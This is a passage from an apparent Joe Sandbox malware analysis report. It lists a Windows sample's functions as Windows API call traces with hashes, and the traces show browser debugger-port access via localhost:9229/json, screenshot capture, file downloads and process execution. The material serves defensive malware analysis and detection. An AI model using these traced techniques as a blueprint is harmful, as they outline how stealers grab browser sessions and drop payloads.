                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 13140697-3278919252
                                • Opcode ID: 4f518c1cf00e009b8d185adce76863798034e33cdd08d6057e60bf6e98879e00
                                • Instruction ID: faf2e9a4d7ca0cf188fe85018dd612eaffb3c320b153c87ec064743cc8c57e59
                                • Opcode Fuzzy Hash: 4f518c1cf00e009b8d185adce76863798034e33cdd08d6057e60bf6e98879e00
                                • Instruction Fuzzy Hash: 43914AB29012199FCB10DFA4D984EEEB7BAFB48310F14856EE509A7351DB31AE45CF90
                                Function 006A90C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                                Download Yara Rule
                                APIs
                                • InternetOpenA.WININET(006CCFEC,00000001,00000000,00000000,00000000), ref: 006A90DF
                                • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 006A90FC
                                • InternetCloseHandle.WININET(00000000), ref: 006A9109
                                • InternetReadFile.WININET(?,?,?,00000000), ref: 006A9166
                                • InternetReadFile.WININET(00000000,?,00001000,?), ref: 006A9197
                                • InternetCloseHandle.WININET(00000000), ref: 006A91A2
                                • InternetCloseHandle.WININET(00000000), ref: 006A91A9
                                • strlen.MSVCRT ref: 006A91BA
                                • strlen.MSVCRT ref: 006A91ED
                                • strlen.MSVCRT ref: 006A922E
                                • strlen.MSVCRT ref: 006A924C
                                  • Part of subcall function 006A8980: std::_Xinvalid_argument.LIBCPMT ref: 006A8996
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                • API String ID: 1530259920-2144369209
                                • Opcode ID: 2127bfe01dcf84c382b5705689e6c03a1d98bcfcc4d09100ec9355ca2d776311
                                • Instruction ID: e1fc41883faff6a5f45b3b310a85d55561e3b6a5d1c3ade0bff7b84ba27033cc
                                • Opcode Fuzzy Hash: 2127bfe01dcf84c382b5705689e6c03a1d98bcfcc4d09100ec9355ca2d776311
                                • Instruction Fuzzy Hash: 19518071A50205ABD720DBA8DC45FEEB7BAEF48710F14016EF505E3280DBB4EE448BA5
                                Function 006C1660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 006C16A1
                                • lstrcpy.KERNEL32(00000000,0132A7B0), ref: 006C16CC
                                • lstrlen.KERNEL32(?), ref: 006C16D9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C16F6
                                • lstrcat.KERNEL32(00000000,?), ref: 006C1704
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C172A
                                • lstrlen.KERNEL32(0133E6E8), ref: 006C173F
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C1762
                                • lstrcat.KERNEL32(00000000,0133E6E8), ref: 006C176A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C1792
                                • ShellExecuteEx.SHELL32(?), ref: 006C17CD
                                • ExitProcess.KERNEL32 ref: 006C1803
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                • String ID: <
                                • API String ID: 3579039295-4251816714
                                • Opcode ID: 0d8aea01420cc48cddb0b13d6f56cb7e2ec98057113124772382864e01d85b1a
                                • Instruction ID: a20ad92ae7fee2318585cc378eae3b4fa66fb6b5fa7c213fd622ce4f2e3f3e68
                                • Opcode Fuzzy Hash: 0d8aea01420cc48cddb0b13d6f56cb7e2ec98057113124772382864e01d85b1a
                                • Instruction Fuzzy Hash: B651747090261AEBDB11EFA5DC94AEEB7FAFF46300F14416AE505E7351DB30AE018B94
                                Function 006BEFB0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BEFE4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BF012
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006BF026
                                • lstrlen.KERNEL32(00000000), ref: 006BF035
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 006BF053
                                • StrStrA.SHLWAPI(00000000,?), ref: 006BF081
                                • lstrlen.KERNEL32(?), ref: 006BF094
                                • lstrlen.KERNEL32(00000000), ref: 006BF0B2
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 006BF0FF
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 006BF13F
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$AllocLocal
                                • String ID: ERROR
                                • API String ID: 1803462166-2861137601
                                • Opcode ID: 520f75cc134b11ec454be87ee2a95cf39acb5d6a73be8e4295abaca290336f65
                                • Instruction ID: 51159b8b01766cfa6f475c0f59641bd9d00b815c80064411f4492b89a66e1e50
                                • Opcode Fuzzy Hash: 520f75cc134b11ec454be87ee2a95cf39acb5d6a73be8e4295abaca290336f65
                                • Instruction Fuzzy Hash: 1551D0B1A511169FCB21BF3DDC59AEE77A7AF41300F09456DF84A9B322EA30DC418B90
                                Function 006AA010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                                Download Yara Rule
                                APIs
                                • GetEnvironmentVariableA.KERNEL32(013390E8,008D9BD8,0000FFFF), ref: 006AA026
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006AA053
                                • lstrlen.KERNEL32(008D9BD8), ref: 006AA060
                                • lstrcpy.KERNEL32(00000000,008D9BD8), ref: 006AA08A
                                • lstrlen.KERNEL32(006D4C4C), ref: 006AA095
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AA0B2
                                • lstrcat.KERNEL32(00000000,006D4C4C), ref: 006AA0BE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AA0E4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006AA0EF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AA114
                                • SetEnvironmentVariableA.KERNEL32(013390E8,00000000), ref: 006AA12F
                                • LoadLibraryA.KERNEL32(013261B8), ref: 006AA143
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                • String ID:
                                • API String ID: 2929475105-0
                                • Opcode ID: 4b8b55200d6106397ec1ec1d5d066dc62a42ca8d858a9d048c9dd01589b78189
                                • Instruction ID: 9411c245ed4a21068278331abc7224e1ba18b050ebe4d6e6bac075a44cb80095
                                • Opcode Fuzzy Hash: 4b8b55200d6106397ec1ec1d5d066dc62a42ca8d858a9d048c9dd01589b78189
                                • Instruction Fuzzy Hash: 4291AA30A01A119FD720BFE9DC44AA637A7BB56704F44025EE50587362EFB5DD40CF92
                                Function 006BC840 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006BC8A2
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006BC8D1
                                • lstrlen.KERNEL32(00000000), ref: 006BC8FC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BC932
                                • StrCmpCA.SHLWAPI(00000000,006D4C3C), ref: 006BC943
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: 81886006ec871a1ad5dd51831dc76cda54442bf6e7fad7e5ef03f629fc35528f
                                • Instruction ID: b50924bcd6adc5111d98c5c725eb2fc98d27464234f180232dc2dcbbef7f9aee
                                • Opcode Fuzzy Hash: 81886006ec871a1ad5dd51831dc76cda54442bf6e7fad7e5ef03f629fc35528f
                                • Instruction Fuzzy Hash: D061B5B1E1121A9BDB10EFB9CC45AEEBBBABF05750F04056EE846E7301D7349E418B90
                                Function 006C41E0 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                                Download Yara Rule
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,006C0CF0), ref: 006C4276
                                • GetDesktopWindow.USER32 ref: 006C4280
                                • GetWindowRect.USER32(00000000,?), ref: 006C428D
                                • SelectObject.GDI32(00000000,00000000), ref: 006C42BF
                                • GetHGlobalFromStream.COMBASE(006C0CF0,?), ref: 006C4336
                                • GlobalLock.KERNEL32(?), ref: 006C4340
                                • GlobalSize.KERNEL32(?), ref: 006C434D
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                • String ID:
                                • API String ID: 1264946473-0
                                • Opcode ID: 1f10000a78d3e54923d23939b57f3a445613d680185afc68651fa485555483b7
                                • Instruction ID: 70bb7eeab5445f78f764ffc4351cf23a910685d41057a8c244081c749639a053
                                • Opcode Fuzzy Hash: 1f10000a78d3e54923d23939b57f3a445613d680185afc68651fa485555483b7
                                • Instruction Fuzzy Hash: DD512175A11209AFDB10EFA5EC49EEEB7B9FF48310F10455AF905E7250DB34AD018B90
                                Function 006BDFA0 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcat.KERNEL32(?,0133ED88), ref: 006BE00D
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006BE037
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BE06F
                                • lstrcat.KERNEL32(?,00000000), ref: 006BE07D
                                • lstrcat.KERNEL32(?,?), ref: 006BE098
                                • lstrcat.KERNEL32(?,?), ref: 006BE0AC
                                • lstrcat.KERNEL32(?,0132A788), ref: 006BE0C0
                                • lstrcat.KERNEL32(?,?), ref: 006BE0D4
                                • lstrcat.KERNEL32(?,0133DB20), ref: 006BE0E7
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BE11F
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006BE126
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 4230089145-0
                                • Opcode ID: 4f9e076bbbbae18c06d84dd614dd8e1615401425abd2315c02fcdebdceb4fd9e
                                • Instruction ID: 98d740ba8ef71f46e58e1457a65edb156d9304277f5756a2cb3524c146967270
                                • Opcode Fuzzy Hash: 4f9e076bbbbae18c06d84dd614dd8e1615401425abd2315c02fcdebdceb4fd9e
                                • Instruction Fuzzy Hash: 2461A3B191111CEBCB65EB68DC54ADDB7B9BF48300F1049A9F64AA3350EB709F858F90
                                Function 006A6AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A6AFF
                                • InternetOpenA.WININET(006CCFEC,00000001,00000000,00000000,00000000), ref: 006A6B2C
                                • StrCmpCA.SHLWAPI(?,0133F3B0), ref: 006A6B4A
                                • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 006A6B6A
                                • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006A6B88
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 006A6BA1
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 006A6BC6
                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 006A6BF0
                                • CloseHandle.KERNEL32(00000000), ref: 006A6C10
                                • InternetCloseHandle.WININET(00000000), ref: 006A6C17
                                • InternetCloseHandle.WININET(?), ref: 006A6C21
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                • String ID:
                                • API String ID: 2500263513-0
                                • Opcode ID: 00682d3549cc9c54a20167cf7f0a58e4c118d9b1cc27649278f8b9cba78bc648
                                • Instruction ID: b7a8e7e1069a8c369dfd3e75b24e1143b299583f64ec1a32865dc75b4dc82aa4
                                • Opcode Fuzzy Hash: 00682d3549cc9c54a20167cf7f0a58e4c118d9b1cc27649278f8b9cba78bc648
                                • Instruction Fuzzy Hash: DD417CB1A41215ABDB20EB64DC85FAE77BAFF44700F044559FA05E7290EF70AE448BA4
                                Function 006C4500 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 95memoryCOMMON
                                Download Yara Rule
